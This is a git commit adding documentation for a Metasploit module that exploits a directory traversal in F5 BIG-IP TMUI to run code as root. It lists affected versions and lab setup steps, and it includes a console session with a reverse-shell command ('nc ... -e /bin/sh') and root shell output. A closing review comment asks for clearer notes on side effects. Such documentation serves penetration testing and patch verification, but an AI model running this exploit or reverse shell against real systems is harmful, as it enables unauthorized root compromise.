Add module doc

William Vu 2020-07-06 18:07:52 -05:00
parent c8176b803a
commit ac3b31a911
1 changed files with 108 additions and 0 deletions


@ -0,0 +1,108 @@
## Vulnerable Application
### Description
This module exploits a directory traversal in F5's BIG-IP Traffic
Management User Interface (TMUI) to upload a shell script and execute
it as the root user.
Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,
15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced
in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.
Tested on the VMware OVA release of 14.1.2.
### Setup
Download
[BIGIP-14.1.2-0.0.37.ALL-scsi.ova](https://downloads.f5.com/esd/serveDownload.jsp?path=/big-ip/big-ip_v14.x/14.1.2/english/virtual-edition/&sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2&container=Virtual-Edition&file=BIGIP-14.1.2-0.0.37.ALL-scsi.ova)
and import it into your desired virtualization software.
## Verification Steps
Follow [Setup](#setup) and [Scenarios](#scenarios).
## Targets
### 0
This executes a Unix command.
### 1
This uses a Linux dropper to execute code.
## Options
### WritableDir
Set this to a writable directory in which files will be dropped.
Defaults to `/tmp`.
## Scenarios
### F5 BIG-IP 14.1.2 in VMware Fusion
```
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
Module options (exploit/linux/http/f5_bigip_tmui_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat_gaping):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.176
rhosts => 172.16.249.176
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
[+] nc 172.16.249.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.249.1 4444 -e /bin/sh
[*] Uploading /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[+] Successfully uploaded /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[*] Executing /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.176:44736) at 2020-07-06 18:05:24 -0500
[+] Deleted /tmp/lxoQO9DPOSpDiF8rP5yNfc4dVo67qsckbdaNc3ES3
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux
```
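Review bot: The Description section says only that the module uploads a shell script and executes it as root, but the Scenarios output shows it also changes state on the target first ("Creating alias list=bash", later "Deleting alias list=bash"), and nothing in the doc explains that step. Add a sentence to Description saying that the alias is created and removed, and that a run interrupted before the "Deleting alias" line can leave both the alias and the dropped file in WritableDir behind, so a tester knows what to check and revert after an engagement. Separately, the vulnerable list includes 15.0.0 while the list of fixed versions has no 15.0.x entry; state explicitly whether that branch has a fix. Verification Steps would also be easier to follow as numbered steps than as two links to other sections.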